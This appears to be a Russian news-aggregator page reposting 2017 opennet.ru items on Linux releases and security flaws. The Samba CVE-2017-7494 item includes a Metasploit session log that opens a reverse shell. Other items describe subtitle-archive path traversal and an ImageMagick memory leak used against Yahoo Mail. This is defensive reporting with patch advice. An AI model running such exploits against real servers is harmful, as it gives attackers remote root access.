Тысячи анкет с фотографиями

Знакомства

Найди свою любовь

Игры

Игры

Онлайн флеш игры

временная фотография

Из Олайне...

Новости мира открытых систем

Я очень дружу с Linux, чего и вам желаю...Поэтому самые свежие новости открытых систем и публикуются, огромное спасибо автору.


Представлен postmarketOS, дистрибутив Linux для устаревших смартфонов


Представлен проект postmarketOS, в рамках которого развивается специализированный дистрибутив Linux, оптимизированный для использования на устройствах с сенсорными экранами и способный работать на устаревших смартфонах, выпущенных десять лет назад. В качестве основы применяется минималистичное системное окружение дистрибутива Alpine Linux, построенного на базе системной библиотеки Musl и набора утилит BusyBox.

Установка производится при помощи развиваемого проектом инструментария pmbootstrap, предоставляющего средства для сборки прошивки и её тестирвоании в chroot-окружении. Проект пока находится на начальной стадии развития и не предоставляет готовые установочные образы, предлагая собрать их самостоятельно. В настоящее время обеспечена возможность сборки для устройств Google Nexus 4 и Samsung Galaxy SII. При этом postmarketOS не ограничивается портированием только для Android-устройств, например, не исключена адаптация дистрибутива для старых iPhone.

Возможности по поддержке оборудования в postmarketOS пока сильно ограничены и не все аппаратные функции поддерживаются и не решены отдельные проблемы (например, проблема отображением цветов на Nexus 4). Например, пока нет поддержки приёма и совершения звонков, но можно использовать Wi-Fi. Для Samsung Galaxy SII вопрос с подключением к сотовым сетям планируется решить через задействование открытых драйверов, развиваемых проектом Replicant. Используемое в postmarketOS ядро Linux основано на наработках LineageOS. Имеется возможность подключения к устройству по SSH, используя соединение через USB-порт. Содержимое корневой файловой системы шифруется. Возможна установка на SD-карту или во внутреннюю память.

В postmarketOS планируется предоставить возможность использования различных пользовательских интерфейсов, по аналогии с тем как обычные Linux-дистрибутивы дают возможность выбора между GNOME, KDE, Xfce и другими рабочими столами. В качестве основных вариантов для поддержки рассматриваются Plasma Mobile и окружение от проекта Ubports, продолжившего разработку Ubuntu Touch. Не исключается также создание собственного Android-подобного минималистичного интерфейса, основанного на libweston.

В текущем виде предлагается демонстрационное окружение на базе протокола Wayland и композитного менеджера Weston. Поддержка 3D-ускорения пока не реализована, но все демонстрации Weston уже работают с приемлемой производительностью. Запуск X-приложений осуществляется через прослойку XWayland. В будущем, если найдутся желающие, не исключается подготовка дополнительных пакетов со слоем совместимости для обеспечения запуска приложений для платформы Android.

В качестве одной из основных причин создания postmarketOS называется желание переломить сложившуюся ситуацию с ограниченным временем поддержки смартфонов. Жизненный цикл современных смартфонов сильно ограничен и направлен на стимулирование покупки новых устройств. Прекращение выпуска обновлений мешает поддержанию прошлых моделей смартфонов в защищённом состоянии. Развитие альтернативных прошивок, таких как LineageOS, лишь устраняет видимые симптомы общей болезни всей экосистемы Android и не избавляет от зависимости от решений основных игроков индустрии, задающих вектор развития.

Целью проекта postmarketOS является обеспечение возможности использования GNU/Linux дистрибутива на смартфоне. Окружение postmarketOS максимально унифицировано и выносит все специфичные для конкретных устройств компоненты в отдельный пакет, все остальные пакеты идентичны для всех устройств и основаны на штатных пакетах Alpine Linux. Alpine Linux выбран как один из самых компактных (минимальный размер сборки - 6 Мб) и защищённых (используются патчи grsecurity/PaX) дистрибутивов. Ядро Linux и правила udev развиваются в рамках совместного проекта Halium, созданного для унификации системных компонентов для Ubuntu Touch, Mer/Sailfish OS, Plasma Mobile, webOS Lune и других Linux-решений для устройств, поставляемых с Android.



Источник: http://www.opennet.ru/opennews/art.shtml?num=46607

Проект по автоматической генерации кода, воспроизводящего интерфейс со скриншота


Группа исследователей в области искусственного интеллекта анонсировала проект pix2code, в рамках которого развивается идея по созданию генератора кода, воссоздающего макет пользовательского интерфейса, изображённого на скриншоте. По мнению разработчиков проект упростит работу дизайнеров интерфейса, который смогут реализовать свои задумки в форме графических макетов, а pix2code даст возможность сформировать на основе предложенных картинок готовый каркас кода, требующий минимальных правок для создания рабочего прототипа приложения.

В процессе генерации кода используется абстрактный предметно-ориентированный язык, который затем преобразуется в представление на языке целевой системы. Данный подход позволяет генерировать код для построения интерфейса для различных платформ и языков. В данный момент обеспечена поддержка воссоздания кода для web-приложений и мобильных приложений для платформ iOS и Android.

В основе pix2code лежит система машинного обучения, натренированная на реальных образцах приложений. Модель для обучения построена на основе примерно 90 тысяч примеров мобильных приложений и 140 тысяч примеров web-интерфейсов. На текущей стадии разработки уже удалось добиться воссоздания интерфейса на основе скриншота с 77% точностью. В ближайшее время связанные с проектом наборы данных и готовую модель для генерации кода планируется опубликовать на GitHub под лицензией Apache 2.0.



Источник: http://www.opennet.ru/opennews/art.shtml?num=46603

Первый релиз Devuan, форка Debian без systemd


После двух с половиной лет разработки состоялся первый стабильный релиз дистрибутива Devuan Jessie 1.0, форка Debian GNU/Linux 8 "Jessie", поставляемого без системного менеджера systemd. Для загрузки подготовлены сборки (minimal 305 Мб, cd install 632 Мб, dvd install 4 Гб и live 828 Мб) для архитектур AMD64 и i386, а также образы для устройств на базе архитектуры ARM (Raspberry Pi 1/2/3, Banana Pi, cubieboard2, odroid, n900, Chromebook Acer и др.). В состав Live-сборок desktop и minimal включены пакеты с прошивками из репозитория non-free.

Целью проекта Devuan является предоставление возможности выбора и защита интересов сторонников классической организации работы Debian. Дистрибутив развивается при поддержке организации Dyne.org и создан после непринятия в общем голосовании разработчиков Debian предложения по внесению изменений в правила проекта, которые бы предоставили возможность использования в Debian разных систем инициализации и помогли бы избежать появления зависимости пакетов только от одной системы инициализации.

Вместо systemd в Devuan поставляется классическая система инициализации SysVinit. В качестве рабочего стола по умолчанию предлагается Xfce и дисплейный менеджер Slim (GNOME, KDE и Cinnamon удалены из списка предлагаемых в инсталляторе наборов (tasksel) из-за привязок к systemd, но могут быть установлены из репозиториев). Для управления пользовательскими сеансами вместо systemd-logind задействован ConsoleKit2. Для настройки сети предлагается вариант конфигуратора NetworkManager, не привязанный к systemd. Опционально предусмотрен режим работы без D-Bus, позволяющий создавать минималистичные конфигурации рабочего стола на базе оконных менеджеров blackbox, fluxbox, fvwm, fvwm-crystal и openbox.

Проектом поддерживаются ответвления для 381 пакета Debian, которые модифицированы для избавления от привязок к systemd, ребрендинга или адаптации для особенностей инфраструктуры Devuan. Два пакета (devuan-baseconf, jenkins-debian-glue-buildenv-devuan) присутствуют только в Devuan и связаны с настройкой репозиториев и работой сборочной системы. В остальном Devuan полностью совместим с Debian и может использоваться в качестве основы для создания специализированных сборок Debian без systemd. В том числе предоставляются возможности по обновлению Debian Wheezy до Devuan и миграции на Devuan с Debian Jessie. Для использования свежих версий программ подготовлен репозиторий с бэкпортами (jessie-backports).

Для создания производных дистрибутивов предлагается Devuanv SDK (Simple Distro Kit). Имеется возможность быстрого формирования live-сборок на основе текущего рабочего окружения. В настоящее время на базе Devuanv уже развивается 12 дистрибутивов: Gnuinos (полностью свободный), Refracta, Exe GNU/Linux, Nelum-dev1, Star, heads (полностью свободный), good-life-linux, EterTICs, MIYO, Dowse, Vuu-do и Crowz.

Специфичные для Devuan пакеты можно загрузить из репозитория packages.devuan.org. Для перехода на Devuan с Debian 7 (Wheezy) или Debian 8 (Jessie) достаточно в /etc/apt/sources.list заменить список репозиториев и выполнить "apt-get update; apt-get install devuan-keyring; apt-get dist-upgrade".

Источник: http://www.opennet.ru/opennews/art.shtml?num=46602

Google и IBM представили Istio, платформу для управления микросервисами


Компании Google, IBM и Lyft представили новый открытый проект Istio, в рамках которого объединили свои наработки в области координации работы микросервисов. О намерении принять участие в развитии проекта также объявили компании Red Hat, Datawire, Pivotal и Tigera. Код компонентов проекта написан на языках Go и C++, исходные тексты распространяются под лицензией Apache 2.0.

Концепция микросервисов подразумевает разбиение сложных монолитных приложений на набор обособленных микросервисов, каждый из которых берёт на себя определённую функциональность приложения. Микросервисы могут работать параллельно, адаптируясь к изменению нагрузки. Таким образом приложение реализуется в виде сети из связанных между собой микросервисов, каждый из которых запускается в отдельном контейнере. Для управления контейнерами предлагается использовать средства оркестровки, подобные Kubernetes, Cloud Foundry и Mesos.

Istio представляет собой слой абстракции, работающий поверх средств оркестровки контейнеров, и выполняет задачи по распределению нагрузки по микросервисам, организации аутентификации, разграничению доступа к микросервисам, защищённого взаимодействия между микросервисами, мониторинга и балансировки нагрузки. При помощи Istio набор запущенных в разных контейнерах микросервисов обретает слаженную функциональность и может работать как единое целое.

Основные составные части Istio:

  • Envoy - прокси для обработки входящего и исходящего трафика между сервисами в кластере, а также обращений к внешним сервисам. Envoy позволяет организовать взаимодействие между микросервисами, составляющими приложение, поверх сети, предоставляемой нижележащей платформой для управления контейнерами. Прокси образуют mesh-сеть из микросервисов, предоставляя такие функции, как обнаружение новых сервисов, маршрутизация потоков данных, построение цепочки обработки запроса и сбор данных телеметрии;
  • Mixer - представляет средства для централизованного управления прокси и микросервисами, обеспечивая применение ACL, ограничений пропускной способности, квот, аутентификации, трассировки запросов и накопления сведений о телеметрии.
  • Manager - управляющий интерфейс, позволяет на лету изменять настройки и управлять работой компонентов Envoy и Mixer.

Особенности платформы:

  • Автоматическая балансировка трафика HTTP, gRPC и TCP;
  • Тонкое управление поведением трафика в зависимости от правил маршрутизации, обеспечения отказоустойчивости и возникновения/симулирования сбоев;
  • Подключаемый слой для применения политик и API для управления доступом, ограничением пропускной способности и квотами;
  • Автоматический сбор метрик, логов и трассировок для всего входящего и исходящего трафика в кластере;
  • Организация защищённых каналов связи между сервисами с аутентификацией каждого сервиса в кластере.

В отличие от недавно представленной похожей платформы Linkerd, Istio не ограничивается организацией сетевого взаимодействия и дополнительно предоставляет такие возможности, как аутентификация и обеспечение правил доступа (policy control). При этом Istio пока поддерживает только Kubernetes, в то время как Linkerd доступен для Kubernetes, DC/OS, Mesos и Docker.

Источник: http://www.opennet.ru/opennews/art.shtml?num=46598

Выпуск интегрированной среды разработки Qt Creator 4.3.0


Представлен выпуск интегрированной среды разработки Qt Creator 4.3.0, предназначенной для создания кроссплатформенных приложений с использованием библиотеки Qt. Поддерживается разработка как классических программ на языке C++, так и использование языка QML, в котором для определения сценариев используется JavaScript, а структура и параметры элементов интерфейса задаются CSS-подобными блоками.

В новой версии:

  • В визуальный проектировщик интерфейса Qt Quick Designer интегрирован редактор кода, который позволяет изменять код одновременно с изменением свойств и навигацией по дереву элементов. В том числе на одном экране можно разместить визуальный и текстовый редакторы, непосредственно наблюдая как сказываются на интерфейсе вносимые в код изменения и, наоборот, как меняется код при манипуляциях в графическом построителе интерфейса.

    В Qt Quick Designer также представлена новая панель инструментов. Реализована поддержка стиля кнопок Qt Quick Controls 2, возможность чтения информации о стилях из файла конфигурации qtquickcontrols2.conf и поддержка смены стилей Qt Quick Controls 2 на лету для оценки изменения интерфейса при выборе разных стилей. Упрощены манипуляции с вкладками и стековыми элементами при визуальном построении интерфейса. Добавлена функция перемещения компонента в отдельный файл.

  • При использовании сборочной системы CMake 3.7+, для взаимодействия с IDE теперь применяется серверный режим CMake, который предоставляет больше информации о структуре проекта и путях размещения заголовочных файлов, не требуя разбора генераторов и файлов Makefile. Применение серверного режима работы с CMake позволяет просматривать в дереве проекта отдельные продукты и сборочные цели, а также собирать их по отдельности. Из других изменений в поддержке CMake отмечается добавление заголовочных файлов в дерево проекта, даже если они явно не упоминаются в файлах проекта, и возможность импорта уже осуществлённых сборок, используя сведения из кэша CMake;
  • В редакторе кода на языке C++ добавлена поддержка контекстов редактирования, позволяющих определить проекты и языки программирования, которые следует применять для файла, в случае его применения в нескольких проектах или использования в нём языка C вместо C++. Разработчикам на C++ также предлагается оценить экспериментальный плагин ClangRefactoring, обеспечивающий начальную поддержку clang-query в диалоге поиска и возможность задействования средств Clang для локального переименования;
  • Для взаимодействие с отладчиком CDB, применяемым для кода MSVC, теперь используется бэкенд на языке Python, в котором задействованы те же методы вывода кода, что и в бэкендах для GDB и LLDB;
  • Решены проблемы при работе с проектами для платформы Android, вызванные изменениями в Android SDK 25.3.1;
  • В QML Profiler при профилировании приложений Qt Quick обеспечен вывод информации о производительности непосредственно в интерфейсе редактора кода QML. В QML Profiler также проведена оптимизация производительности и устранены мелкие недоработки в интерфейсе.


Источник: http://www.opennet.ru/opennews/art.shtml?num=46594

Уязвимость в Samba, позволяющая выполнить код на сервере


Опубликованы корректирующие обновления Samba 4.6.4, 4.5.10 и 4.4.14, в которых устранена критическая уязвимость (CVE-2017-7494), позволяющая организовать выполнение кода на сервере при наличии доступа на запись в предоставляемое сервером хранилище. Уязвимость позволяет клиенту загрузить разделяемую библиотеку на SMB-хранилище и инициировать её загрузку сервером. Проблема вызвана ошибкой в реализации IPC для именованных каналов для клиентов Windows NT.

Уязвимости подвержены все версии Samba, начиная с 3.5.0, поэтому дополнительно подготовлены патчи для старых версий. В качестве обходного пути защиты можно добавить в параметр "nt pipe support = no" в секцию "[global]" smb.conf и перезапустить smbd. Обновления пакетов уже сформированы для FreeBSD, Debian, Fedora и RHEL. Проследить за выпуском обновлений пакетов в других дистрибутивах можно на данных страницах: Ubuntu, openSUSE, SUSE, CentOS.

Дополнение: Подготовлен прототип эксплоита, позволяющий выполнить код с правами smbd (обычно root) при наличии доступа на запись в хранилище. Администраторам Samba-серверов рекомендуется не затягивать с установкой обновления, так как вероятно появление поддержки данного эксплоита во вредоносном ПО, поражающем локальные сети (например, машина неквалифицированного пользователя может быть взломана через уязвимость в браузере, PDF-просмотрщике или запуск пришедшего по почте троянского ПО, после чего через эту систему может быть атакован внутренний Samba-сервер).

     msf exploit(is_known_pipename) > exploit        [*] Started reverse TCP handler on 192.168.0.3:4444      [*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path     [*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as   GTithXJz.so     [*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...     [*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500       id     uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)    


Источник: http://www.opennet.ru/opennews/art.shtml?num=46591

Атака на Kodi, VLC и Popcorn-Time через вредоносные субтитры


В популярных открытых мультимедийных проигрывателях и медиацентрах, включая VLC, Kodi (XBMC), Popcorn-Time и strem.io, выявлена уязвимость, позволяющая получить контроль за окружением пользователя при обработке специально оформленных субтитров. Проблема устранена в Kodi 17.2, Popcorn-Time 0.3.10, strem.io 3.6.5 и VLC 2.2.5.1 (частично, полное исправление ожидается в версии 2.2.6). До установки обновления с устранением проблемы пользователям рекомендуется воздержаться от загрузки непроверенных субтитров из публичных сервисов, таких как OpenSubtitles.org.

Технические детали о методе атаки не публикуются, чтобы дать пользователям время на обновление, но судя по принятому в Kodi 17.2 патчу, проблема вызвана отсутствием экранирования символов ".." в файловых путях zip-архива с субтитрами. Атакующий может подготовить специально оформленный zip-архив, при распаковке которого может быть переписан любой файл в системе в рамках прав доступа текущего процесса с медиаплеером. Кроме того, в Popcorn-Time, судя по всему, устранена другая уязвимость, связанная с возможностью подстановки JavaScript-кода (межсайтовый скриптинг) в состав субтитров в формате SRT, который будет обработан в контексте JavaScript-движка, применяемого для построения интерфейса приложения. В VLC уязвимости вызваны переполнениями буфера в обработчике субтитров.



Источник: http://www.opennet.ru/opennews/art.shtml?num=46590

В Linux обеспечена возможность устранения уязвимости MouseJack в устройствах Logitech


Ричард Хьюз (Richard Hughes), создатель проекта PackageKit, активно участвующий в разработке Fedora и GNOME, реализовал для Linux инструмент для обновления прошивок беспроводных мышей, подверженных атаке MouseJack. Несмотря на то, что атака MouseJack была разработана более года назад, некоторые производители до сих пор не выпустили инструментарий для обновления прошивки, который можно было бы использовать в Linux. В частности Logitech не относит Linux к числу официально поддерживаемых систем и не планирует выпускать исправления.

При этом MouseJack является достаточно опасной проблемой, позволяющей из-за отсутствия защиты протокола, используемого при обмене данными между компьютером и мышью, получить контроль над беспроводными мышами на расстоянии до ста метров и симулировать через них клавиатурный ввод (протокол поддерживает передачу сведений о нажатиях клавиш). Так как исправление поставляется только в виде exe-файла, Linux-пользователи подобных устройств вынуждены были искать систему с Windows, подключать к ней свою мышь и выполнять обновление прошивки. В случае использования ноутбуков со встроенными адаптерами беспроводных мышей требовалась загрузка Windows на данном ноутбуке.

Для решения возникшей проблемы Ричард адаптировал применяемый в Fedora инструментарий fwupd для установки в Linux обновлений прошивок, предоставляемых компанией Logitech для других платформ. Исправление в том числе может быть использовано для беспроводных мышей Amazon, Microsoft, Lenovo и Dell, которые выпускаются по контракту компанией Logitech под другими брендами. Изначально метод обновления был воссоздан на основе обратного инжиниринга пакета для загрузки обновления, поставляемого для платформы Windows. Но затем инженеры Logitech предоставили разработчику официальную документацию по организации доступа к внутреннему интерфейсу замены прошивки в ресиверах и подверженных проблеме периферийных компонентах.

На основании данной документации в fwupd была добавлена полноценная поддержка смены прошивок в оборудовании Logitech. Для обновления прошивки в Fedora теперь достаточно обновить пакет fwupd до версии 0.9.2-2.fc26, активировать тестовый канал доставки обновлений (параметр DownloadURI) в файле конфигурации /etc/fwupd.conf и запустить команду "fwupdmgr refresh && fwupdmgr", вызвать GNOME Software или выполнить перезапуск сервиса.



Источник: http://www.opennet.ru/opennews/art.shtml?num=46589

Стабильный выпуск СУБД MariaDB 10.2


После полутора лет разработки и пяти предварительных выпусков сформирован первый стабильный релиз новой ветки СУБД MariaDB 10.2, в рамках которой развивается ответвление от MySQL, сохраняющее обратную совместимость и отличающееся интеграцией дополнительных движков хранения и расширенных возможностей. Развитие MariaDB курирует независимая организация MariaDB Foundation в соответствии с полностью открытым и прозрачным процессом разработки, не зависящим от отдельных вендоров. MariaDB поставляется вместо MySQL во многих дистрибутивах Linux (RHEL 7, SUSE 12, Fedora, openSUSE, Slackware, OpenMandriva, ROSA, Arch Linux, Debian 9) и внедрён в таких крупных проектах, как Wikipedia, Google Cloud SQL и Nimbuzz.

Ключевые улучшения MariaDB 10.2:

  • Добавлена экспериментальная поддержка движка хранения MyRocks, разработанного Facebook на базе системы хранения RocksDB, оптимизированной для Flash-накопителей. В хранилище MyRocks применяются страницы данных плавающего размера, позволяющие избежать выравнивания по фиксированной границе блока, и модель хранения данных в форме лога (Log Structured Merge Trees), допускающая только дополнение (чистка производится сборщиком мусора). В процессе выполнение запросов в несколько раз сокращается число операций случайного чтения/записи, что приводит к увеличению производительности по сравнению с InnoDB на 20-30% на SDD и до 6 раз на НЖМД при нагрузке с большим числом операций случайной записи. Кроме того, MyRocks позволяет на 50% сократить размер БД по сравнению со сжатым хранилищем InnoDB и в 3.5 раза по сравнению с InnoDB без применения сжатия. Из недостатков MyRocks можно отметить отсутствие поддержки внешних ключей и полнотекстовых индексов;
  • Добавлена поддержка оконных функций, задаваемых ключевым словом OVER и позволяющих совершить вычисление над набором строк, связанных с текущей строкой. По аналогии с агрегатными функциями оконные функции позволяют обратиться к другим строкам в процессе обработки результата запроса, но в отличие от агрегатных функций они не группируют результат в одну строку;
  • Поддержка общих табличных выражений (выражение "WITH") и рекурсивных общих табличных выражений ("WITH RECURSIVE"). Секцию WITH можно использовать для определения подзапросов как локальных временных таблиц, на которые можно много раз ссылаться в запросе. "WITH RECURSIVE" позволяет обращаться к собственному результату, например, можно организовать обход дерева в процессе выполнении запроса;
  • Добавлено выражение "CONSTRAINT... CHECK" в блоке "CREATE TABLE" для задания ограничений столбца;
  • Реализована возможность указания выражений в блоке DEFAULT, например "b int DEFAULT (a+1)". Обеспечена поддержка указания значений DEFAULT для полей BLOB и TEXT;
  • Хранилище InnoDB обновлено до выпуска из состава MySQL 5.7.18 и задействовано по умолчанию (ранее по умолчанию предлагалось ответвление от InnoDB - XtraDB, смысл использования которого потерялся после того, как в InnoDB реализовали большинство основных возможностей XtraDB). В InnoDB добавлена поддержка пространственных индексов (spatial index);
  • Добавлено выражение "SHOW CREATE USER", показывающее полное выражение "CREATE USER", использованное для создания указанного пользователя;
  • Для выражения "CREATE USER" реализованы опции для ограничения потребления ресурсов и настройки tls/ssl. Например, теперь можно ограничить максимальное число запросов или соединений в час;
  • Представлено новое выражение "ALTER USER", позволяющее внести изменения в учётную запись существующего пользователя;
  • Сняты многие ограничения для виртуально вычисляемых столбцов;
  • Добавлена поддержка выражения "EXECUTE IMMEDIATE" для запуска динамического SQL-выражения, созданного на лету;
  • В оператор PREPARE добавлена возможность использования большинства выражений;
  • Добавлены функции для работы с данными в формате JSON;
  • Добавлен плагин аутентификации, использующий алгоритм ed25519 для хранения паролей;
  • В состав сборок для Windows, CentOS, RHEL и Fedora добавлен плагин для расшифровки ключей, используемых в Amazon Web Services (AWS) Key Management Service (KMS), для их последующего использования для шифрования данных в БД;
  • Появилась возможность привязки нескольких разных триггеров к одному событию;
  • Добавлена поддержка отложенной репликации, при которой состояние slave-сервера на заданный промежуток времени отстаёт от master-сервера;
  • Переработана реализация выражения ANALYZE TABLE, которое теперь не блокирует таблицу во время сбора статистики;
  • Библиотека wsrep, используемая для организации синхронной multi-master (active-active) репликации Galera, обновлена до выпуска 25.3.20;
  • Обеспечено формирование пакетов для Ubuntu 17.04;
  • В mysqldump добавлена опция "--add-drop-trigger", воспроизводящая функциональность MySQL 5.6 по добавлению в SQL-дамп выражения для удаления триггера перед его созданием;
  • Добавлен скрипт mysqlbinlog для организации непрерывного бэкапа бинарного лога. Скрипт поддерживает режим flashback, при помощи которого можно откатить состояние БД или отдельной таблицы на ранее созданный снапшот;
  • Сокращено время установки соединений за счёт выноса создания дескриптора соединений (THD) в отдельную нить и увеличения эффективности кэширования. В некоторых случаях ускорение может достигать 85%;
  • Добавлена поддержка OpenSSL 1.1 и LibreSSL;
  • Добавлены переменные innodb_deadlock_detect и innodb_stats_include_delete_marked для отключения система определения взаимных блокировок и учёта записей, помеченных как удалённые, при расчёте статистики;
  • Добавлена переменная read_binlog_speed_limit, задающая ограничение скорости с которой slave-сервер читает бинарный лог master-сервера;
  • Удалена старая клиентская библиотека, поставляемая под лицензией GPL, на смену которой пришла новая библиотека, имеющая лицензию LGPL.


Источник: http://www.opennet.ru/opennews/art.shtml?num=46585

Уязвимость в ImageMagick, позволившая получить доступ к чужим вложениям в почте Yahoo


Крис Эванс (Chris Evans), известный эксперт по компьютерной безопасности и автор защищенного FTP-сервера vsftpd, опубликовал сведения о новой уязвимости (CVE-2017-9098, кодовое имя "Yahoobleed1") в пакете ImageMagick, который часто используется web-разработчиками для преобразования изображений. Примечательно, что в GraphicsMagick, ответвлении от ImageMagick, уязвимость была устранена ещё в марте 2016 года, но из-за отсутствия скоординированных действий по устранению уязвимостей в обоих проектах проблема осталась неисправленной в ImageMagick.

Проблема присутствует в декодере RLE, который использует неинициализированные блоки памяти, что позволяет атакующему получить доступ к информации, оставшейся от других обработчиков в данном процессе. Наиболее интересным моментом стала разработка практического метода атаки на основе данной проблемы. Крис Эванс показал, что уязвимость можно использовать для атаки на сервис Yahoo Mail для получения доступа к вложениям чужих писем через отправку письма со специально оформленной картинкой во вложении.

При организации предпросмотра вложений Yahoo применяет постоянно запущенный обработчик, который использует ImageMagick для обработки изображений, что позволяет через эксплуатацию рассматриваемой уязвимости получить доступ к данным, оставшимся от обработки вложений других пользователей. В частности, Крис отправил себе письмо со специально оформленным 18-байтовым изображением, для предпросмотра которого через web-интерфейс было сформировано JPEG-изображение 1024x1024, состоящее из данных, остающихся в памяти после обработки вложений других пользователей.

Проблема устранена в ImageMagick 7.0.5-2 и GraphicsMagick 1.3.24. Обновления в дистрибутивах ещё не выпущены, проследить за их появлением можно на данных страницах: Debian, SUSE/openSUSE, RHEL, Fedora, Ubuntu, FreeBSD. Следует отметить, что проблема представляет опасность только в длительно работающих процессах, циклично обрабатывающих запросы.

Кроме того, Крис Эванс разработал ещё одну технику атаки на Yahoo Mail, назвав её "Yahoobleed2". Атака основана на уязвимости, исправленной ещё в январе 2015 года, но оставшейся неустранённой в варианте пакета ImageMagick, применяемом в Yahoo. Атака также выполняется через предпросмотр специально оформленного вложения и позволяет получить содержимое браузерных cookies, токенов аутентификации и частей изображений других пользователей Yahoo Mail. Компания Yahoo выплатила исследователю вознаграждение в размере 28 тысяч долларов (две премии по 14 тысяч) и приняла решение прекратить использование пакета ImageMagick в своих службах.

Источник: http://www.opennet.ru/opennews/art.shtml?num=46584


Новинки


страницы: